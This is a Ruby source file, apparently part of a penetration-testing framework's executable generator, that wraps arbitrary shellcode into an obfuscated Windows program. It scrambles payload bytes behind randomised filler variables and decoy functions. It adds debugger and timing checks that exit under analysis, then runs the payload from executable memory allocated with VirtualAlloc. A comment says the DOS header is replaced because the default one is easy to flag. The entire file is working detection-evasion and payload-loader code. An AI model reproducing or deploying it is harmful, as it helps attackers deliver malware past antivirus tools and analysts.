require 'pro/exegen/pseudofunction'

module Pro
module ExeGen
class BaseGenerator

	VAR_NAME_LENGTH = 12

	UBOUND_FILLER_VARS = 50

	UBOUND_FIRST_FUNCTIONS        = 20
	UBOUND_SECOND_FUNCTIONS   = 10
	LBOUND_FUNCTIONS                    = 10

	def initialize(code)
		@code =  code
		@names = {
			:idx_code  => ::Rex::Text.rand_text_alpha(VAR_NAME_LENGTH) ,
			:code      => ::Rex::Text.rand_text_alpha(VAR_NAME_LENGTH) ,
		}
		@ccode = generate_c
	end

	attr_reader :ccode
	attr_reader :names
	attr_reader :code

	def function_caller_grab_bag(function_callers)
		str = ""
		1.upto((rand(7) + 1)){ str << " #{function_callers[rand(function_callers.length)]}\n" }
		return str
	end

	def unscramble_func
		unscramble = ::Pro::ExeGen::Pseudofunction.new
		unscramble.params = [{:type=>"unsigned char", :name=>"*code", :value=>nil}, {:type=>"int", :name=>"*idx", :value=>nil}]
		unscramble.definition = <<EOS
void #{unscramble.name}(unsigned char *code, int *idx) {
unsigned char tmp[#{@code.length}];
	for (int i=0; i<#{@code.length}; i++){
		tmp[i] = code[idx[i]];
	}
	for (int i=0; i<#{@code.length}; i++){
		code[i] = tmp[i];
	}
}
EOS
		return unscramble
	end



	def idbp_func
		idbp = ::Pro::ExeGen::Pseudofunction.new( :name => 'chkidbp')
		idbp.definition = <<EOS
void chkidbp()
{
	PIDBP idbp = (PIDBP) GetProcAddress(LoadLibrary("kernel32.dll"), "IsDebuggerPresent");
	PEP exitp = (PEP) GetProcAddress(LoadLibrary("kernel32.dll"), "ExitProcess");
	if (idbp()){
		exitp(0);
	}
}

EOS
		idbp.fcaller = "chkidbp();\n"
		return idbp
	end


	def rdbp_func
		rdbp = ::Pro::ExeGen::Pseudofunction.new( :name => 'chkrdbp')
		rdbp.definition = <<EOS
void chkrdbp()
{
	PEP exitp = (PEP) GetProcAddress(LoadLibrary("kernel32.dll"), "ExitProcess");
	PCRDBP crdbp = (PCRDBP) GetProcAddress(LoadLibrary("kernel32.dll"), "CheckRemoteDebuggerPresent");
	PGCP gcp = (PGCP) GetProcAddress(LoadLibrary("kernel32.dll"), "GetCurrentProcess");
	BOOL remotedbg;
	crdbp(gcp(), &remotedbg );
	if (remotedbg){
		exitp(0);
	}
}

EOS
		rdbp.fcaller = "chkrdbp();\n"
		return rdbp
	end

	def tickcount_func
		tickcount = ::Pro::ExeGen::Pseudofunction.new( :name => "chktck")
		tickcount.definition = <<EOS
void chktck()
{
	DWORD tc;
	PEP exitp = (PEP) GetProcAddress(LoadLibrary("kernel32.dll"), "ExitProcess");
	PGTC gtcount = (PGTC) GetProcAddress(LoadLibrary("kernel32.dll"), "GetTickCount");
	tc = gtcount();
	Sleep(650);
	if (((gtcount() - tc) / 300) != 2){
		exitp(0);
	}
}
EOS
		tickcount.fcaller = "chktck();\n"
		return tickcount
	end

	def variable_defs
		vdefs = [] 
		vdefs << %Q|unsigned char #{@names[:code]}[#{@code.length}];|
		vdefs << %Q|int #{@names[:idx_code]}[#{@code.length}];|
		(rand(UBOUND_FILLER_VARS) +1).times do
			type = [ "short", "unsigned short", "int", "unsigned int", "double", "float", "long"][rand(7)]
			name = ::Rex::Text.rand_text_alpha(VAR_NAME_LENGTH)
			vdefs << "#{type} #{name};" 
		end
		retdefs = Rex::Text.shuffle_a(vdefs).join("\n")
		return retdefs
	end

	def payload_data
		seq  = []
		buff = @code
		idx_code = []
		0.upto((@code.length-1)){|i| idx_code << i}
		idx_code = Rex::Text.shuffle_a(idx_code)
		idx_code.each_with_index{|value, idx| seq << "#{@names[:idx_code]}[#{idx}]=#{value};"}

		idx  = 0;
		buff.unpack("C*").each do |c|
			seq << "#{@names[:code]}[#{idx_code[idx]}] = #{c};"
			idx += 1
		end
	
		(rand(UBOUND_FILLER_VARS) +1).times do 
			type = [ "short", "unsigned short", "int", "unsigned int", "double", "float", "long"][rand(7)]
			name = ::Rex::Text.rand_text_alpha(VAR_NAME_LENGTH)
			seq << "#{type} #{name} = #{rand(5000)};" 
		end

		scrabble = Rex::Text.shuffle_a(seq).join("\n")
		return scrabble
	end

	def payload_func(payload_data,unscramble_name,function_callers)
		payload = ::Pro::ExeGen::Pseudofunction.new
		payload.params = []

		

		payload.definition = <<EOS
void #{payload.name}(void){
	#{function_caller_grab_bag(function_callers)}
	for(int i=0;i<500;i++){
		for(int j=0;j<500;j++){
			#{function_caller_grab_bag(function_callers)}
		}
	}
	DWORD tc;
	PGTC gtcount = (PGTC) GetProcAddress(LoadLibrary("kernel32.dll"), "GetTickCount");
	PSLP slp = (PSLP) GetProcAddress(LoadLibrary("kernel32.dll"), "Sleep");


	tc = gtcount();
	slp(650);
	if (((gtcount() - tc) / 300) != 2){
		return 0;
	}
	#{function_caller_grab_bag(function_callers)}
	#{payload_data}
	#{function_caller_grab_bag(function_callers)}
	#{unscramble_name}(#{@names[:code]}, #{@names[:idx_code]});	
	#{function_caller_grab_bag(function_callers)}
	LPVOID ep;
	PVA valoc = (PVA) GetProcAddress(LoadLibrary("kernel32.dll"), "VirtualAlloc");
	ep = valoc(NULL, #{ (1024*1024) + rand(256) * 1024 }, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	PMCPY mmcy = (PMCPY) GetProcAddress(LoadLibrary("ntdll.dll"), "memcpy");
	mmcy(ep, &#{@names[:code]}, sizeof(#{@names[:code]}));

	((void (*)())ep)();
	return 0;
}

EOS
		return payload
	end
	

	def generate_c
		
		first_function_set = []
		(rand(UBOUND_FIRST_FUNCTIONS) + LBOUND_FUNCTIONS).times{first_function_set << ::Pro::ExeGen::Pseudofunction.new }
		first_function_set << idbp_func
		first_function_set << rdbp_func
		first_function_set << tickcount_func

		
		second_function_set = []
		(rand(UBOUND_SECOND_FUNCTIONS) + LBOUND_FUNCTIONS).times do 
			subs = []
			0.upto(rand(5)){|n| subs << first_function_set[rand(first_function_set.length)]}
			second_function_set << ::Pro::ExeGen::Pseudofunction.new( :subs => subs)
		end

		first_function_calls = []
		first_function_set.each{|function| first_function_calls << "#{function.fcaller}" }
		second_function_calls = []
		second_function_set.each{|function| second_function_calls << "#{function.fcaller}" }



		
		first_function_calls = Rex::Text.shuffle_a(first_function_calls)
		usf = unscramble_func
		payload = payload_func(payload_data,usf.name,first_function_calls)

		#second_function_calls << "#{payload.name}();"
		second_function_calls = Rex::Text.shuffle_a(second_function_calls).join("\n")

		
		first_function_calls = first_function_calls.join("\n")


		first_function_set << usf

		second_function_set << payload
		first_function_set = Rex::Text.shuffle_a(first_function_set)
		second_function_set = Rex::Text.shuffle_a(second_function_set)

		function_definitions = ""
		first_function_set.each{|function| function_definitions << "#{function.definition}\n\n" }
		second_function_set.each{|function| function_definitions << "#{function.definition}\n\n" }


agent_wrapper = <<EOS
#{includy_stuff}
#{variable_defs}

#{function_definitions}


void main(void)
{
	#{first_function_calls}
	#{second_function_calls}
	#{payload.name}();
}
EOS
	end

	def exe
		cpu = Metasm::Ia32.new
		pe  = Metasm::PE.compile_c(cpu, @ccode)
		#Override the default Metasm DOS header for the PE
		#Metasm egenrates an improperly crafted DOS header by default which is easy to flag
		#We override it here with a standard DOS header
		foo= "MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00\xB8\x00\x00\x00\x00" + 
			"\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\xD8\x00\x00\x00\x0E\x1F\xBA\x0E\x00\xB4\t" +
			"\xCD!\xB8\x01L\xCD!This program cannot be run in DOS mode.\r\r\n$\x00\x00\x00\x00" +
			"\x00\x00\x00\bs\xA6SL\x12\xC8\x00L\x12\xC8\x00L\x12\xC8\x00Ej]" +
			"\x00E\x12\xC8\x00L\x12\xC9\x00\xD8\x13\xC8\x00Ej[\x00m\x12\xC8\x00EjK\x00W\x12\xC8" + 
			"\x00EjL\x00\xCE\x12\xC8\x00Ej\\\x00M\x12\xC8\x00EjY\x00M\x12" +
			"\xC8\x00RichL\x12\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00"
		pe.mz.encoded << foo
		pe.encode_string
	end



	def includy_stuff
		incl = <<EOS
#define PAYLOAD_SIZE	#{@code.length}
#define NULL 0
#define SERVICES_ACTIVE_DATABASEA "ServicesActive"
#define SERVICES_ACTIVE_DATABASEW L"ServicesActive"
#define SERVICES_FAILED_DATABASEA "ServicesFailed"
#define SERVICES_FAILED_DATABASEW L"ServicesFailed"
#define SC_GROUP_IDENTIFIERA '+'
#define SC_GROUP_IDENTIFIERW L'+'
#define SC_MANAGER_ALL_ACCESS	0xf003f
#define SC_MANAGER_CONNECT	1
#define SC_MANAGER_CREATE_SERVICE	2
#define SC_MANAGER_ENUMERATE_SERVICE	4
#define SC_MANAGER_LOCK	8
#define SC_MANAGER_QUERY_LOCK_STATUS	16
#define SC_MANAGER_MODIFY_BOOT_CONFIG	32
#define SERVICE_NO_CHANGE	(-1)
#define SERVICE_STOPPED	1
#define SERVICE_START_PENDING	2
#define SERVICE_STOP_PENDING	3
#define SERVICE_RUNNING	4
#define SERVICE_CONTINUE_PENDING	5
#define SERVICE_PAUSE_PENDING	6
#define SERVICE_PAUSED	7
#define SERVICE_ACCEPT_STOP	1
#define SERVICE_ACCEPT_PAUSE_CONTINUE	2
#define SERVICE_ACCEPT_SHUTDOWN 4
#define SERVICE_CONTROL_STOP	1
#define SERVICE_CONTROL_PAUSE	2
#define SERVICE_CONTROL_CONTINUE	3
#define SERVICE_CONTROL_INTERROGATE	4
#define SERVICE_CONTROL_SHUTDOWN	5
#define SERVICE_ACTIVE 1
#define SERVICE_INACTIVE 2
#define SERVICE_STATE_ALL 3
#define SERVICE_QUERY_CONFIG 1
#define SERVICE_CHANGE_CONFIG 2
#define SERVICE_QUERY_STATUS 4
#define SERVICE_ENUMERATE_DEPENDENTS 8
#define SERVICE_START 16
#define SERVICE_STOP 32
#define SERVICE_PAUSE_CONTINUE 64
#define SERVICE_INTERROGATE 128
#define SERVICE_USER_DEFINED_CONTROL 256

#define PAGE_NOACCESS	0x0001
#define PAGE_READONLY	0x0002
#define PAGE_READWRITE	0x0004
#define PAGE_WRITECOPY	0x0008
#define PAGE_EXECUTE	0x0010
#define PAGE_EXECUTE_READ	0x0020
#define PAGE_EXECUTE_READWRITE	0x0040
#define PAGE_EXECUTE_WRITECOPY	0x0080
#define PAGE_GUARD		0x0100
#define PAGE_NOCACHE		0x0200


#define MEM_COMMIT           0x1000
#define MEM_RESERVE          0x2000
#define MEM_DECOMMIT         0x4000
#define MEM_RELEASE          0x8000
#define MEM_FREE            0x10000
#define MEM_PRIVATE         0x20000
#define MEM_MAPPED          0x40000
#define MEM_RESET           0x80000
#define MEM_TOP_DOWN       0x100000
#define MEM_WRITE_WATCH	   0x200000 /* 98/Me */
#define MEM_PHYSICAL	   0x400000
#define MEM_4MB_PAGES    0x80000000

#define SERVICE_WIN32_SHARE_PROCESS 0x00000020
#define SERVICE_WIN32_OWN_PROCESS 0x00000010
#define SERVICE_RECOGNIZER_DRIVER 0x00000008
#define SERVICE_KERNEL_DRIVER 0x00000001
#define SERVICE_FILE_SYSTEM_DRIVER 0x00000002
#define SERVICE_ADAPTER 0x00000004
#define ERROR_ALREADY_EXISTS 183
#define TRUE 1
#define FALSE 0

#define WM_USER                         0x0400

typedef int BOOL;
typedef unsigned char BYTE;
typedef char CHAR;
typedef unsigned long DWORD;
typedef __stdcall int (*FARPROC)();
typedef float FLOAT;
typedef long FXPT2DOT30;
typedef void *HANDLE;
typedef short SHORT;
typedef int INT;
typedef int INT_PTR;
typedef long LONG;
typedef __int64 LONGLONG;
typedef long LONG_PTR;
typedef unsigned char UCHAR;
typedef unsigned int UINT;
typedef unsigned int UINT_PTR;
typedef unsigned long ULONG;
typedef unsigned __int64 ULONGLONG;
typedef unsigned long ULONG_PTR;
typedef unsigned short USHORT;
typedef unsigned short WORD;
typedef BOOL *LPBOOL;
typedef BOOL *PBOOL;
typedef BYTE *LPBYTE;
typedef const CHAR *LPCCH;
typedef CHAR *LPCH;
typedef const CHAR *LPCSTR;
typedef DWORD *LPDWORD;
typedef DWORD *PDWORD;
typedef HANDLE *LPHANDLE;
typedef CHAR *LPSTR;
typedef WORD *LPWORD;
typedef LONG_PTR LRESULT;
typedef LONG LSTATUS;
typedef LONG NTSTATUS;
typedef unsigned int size_t;
typedef const char *PCSZ;
typedef unsigned int *PUINT;
typedef unsigned long *PULONG_PTR;
typedef void *PVOID;
typedef void *LPVOID;

struct HINSTANCE__ {
	int unused;
};

typedef struct HINSTANCE__ *HINSTANCE;
typedef HINSTANCE HMODULE;

typedef __stdcall void (*LPSERVICE_MAIN_FUNCTIONA)(DWORD dwNumServicesArgs, LPSTR *lpServiceArgVectors);

struct _SERVICE_TABLE_ENTRYA {
	LPSTR lpServiceName;
	LPSERVICE_MAIN_FUNCTIONA lpServiceProc;
};

struct SERVICE_STATUS_HANDLE__ {
	int unused;
};

typedef struct SERVICE_STATUS_HANDLE__ *SERVICE_STATUS_HANDLE;

struct _SERVICE_STATUS {
	DWORD dwServiceType;
	DWORD dwCurrentState;
	DWORD dwControlsAccepted;
	DWORD dwWin32ExitCode;
	DWORD dwServiceSpecificExitCode;
	DWORD dwCheckPoint;
	DWORD dwWaitHint;
};


typedef struct _SERVICE_TABLE_ENTRYA SERVICE_TABLE_ENTRYA;
typedef struct _SERVICE_STATUS *LPSERVICE_STATUS;
typedef struct _SERVICE_STATUS SERVICE_STATUS;
typedef __stdcall void (*LPHANDLER_FUNCTION)(DWORD dwControl);

__cdecl void *memcpy(void *, void *, size_t);
__cdecl void *memset(void *, int, size_t);
__stdcall void * ExitProcess __attribute__((dllimport))(void * var80 );
__stdcall void Sleep __attribute__((dllimport))(DWORD dwMilliseconds __attribute__((in)));
__stdcall DWORD GetTickCount __attribute__((dllimport))(void);
__stdcall BOOL StartServiceCtrlDispatcherA __attribute__((dllimport))(const SERVICE_TABLE_ENTRYA *lpServiceStartTable __attribute__((in)));
__stdcall BOOL SetServiceStatus __attribute__((dllimport))(SERVICE_STATUS_HANDLE hServiceStatus __attribute__((in)), LPSERVICE_STATUS lpServiceStatus __attribute__((in)));
__stdcall SERVICE_STATUS_HANDLE RegisterServiceCtrlHandlerA __attribute__((dllimport))(LPCSTR lpServiceName __attribute__((in)), LPHANDLER_FUNCTION lpHandlerProc __attribute__((in)));
__stdcall BOOL VirtualProtect __attribute__((dllimport))(LPVOID lpAddress __attribute__((in)), size_t dwSize __attribute__((in)), DWORD flNewProtect __attribute__((in)), PDWORD lpflOldProtect __attribute__((out)));
__stdcall LPVOID VirtualAlloc __attribute__((dllimport))(LPVOID lpAddress __attribute__((in)), size_t dwSize __attribute__((in)), DWORD flAllocationType __attribute__((in)), DWORD flProtect __attribute__((in)));

typedef __stdcall int (*FARPROC)();

__stdcall HMODULE GetModuleHandle __attribute__((dllimport))(LPCSTR lpFileName __attribute__((in)));
__stdcall HMODULE LoadLibrary __attribute__((dllimport))(LPCSTR lpLibFileName __attribute__((in)));
__stdcall FARPROC GetProcAddress __attribute__((dllimport))(HMODULE hModule __attribute__((in)), LPCSTR lpProcName __attribute__((in)));

//memcpy
typedef void (*PMCPY)(void *, void *, size_t);

//VirtualAlloc
typedef LPVOID (__stdcall *PVA)(LPVOID,size_t,DWORD,DWORD);
typedef BOOL (__stdcall *PSSS)(SERVICE_STATUS_HANDLE, LPSERVICE_STATUS);
typedef SERVICE_STATUS_HANDLE (__stdcall *PRSCH)(LPCSTR, LPHANDLER_FUNCTION);
typedef BOOL (__stdcall *PSSCD)(const SERVICE_TABLE_ENTRYA *);
typedef void (__stdcall *PSLP)(DWORD);
typedef DWORD (__stdcall *PGTC)(void);
typedef BOOL (__stdcall *PIDBP)(void);
typedef HANDLE (__stdcall *PGCP)(void);
typedef BOOL (__stdcall *PCRDBP)(HANDLE,PBOOL);

//GetModuleHandle
typedef HMODULE (__stdcall *PGMH)(LPCSTR);
//VirtualProtect
typedef BOOL (__stdcall *PVP)(LPVOID,size_t,DWORD,PDWORD);
typedef void (__stdcall *PEP)(UINT);
//GetcurrentThread
typedef HANDLE (__stdcall *PGCT)(void);
EOS

	end


end
end
end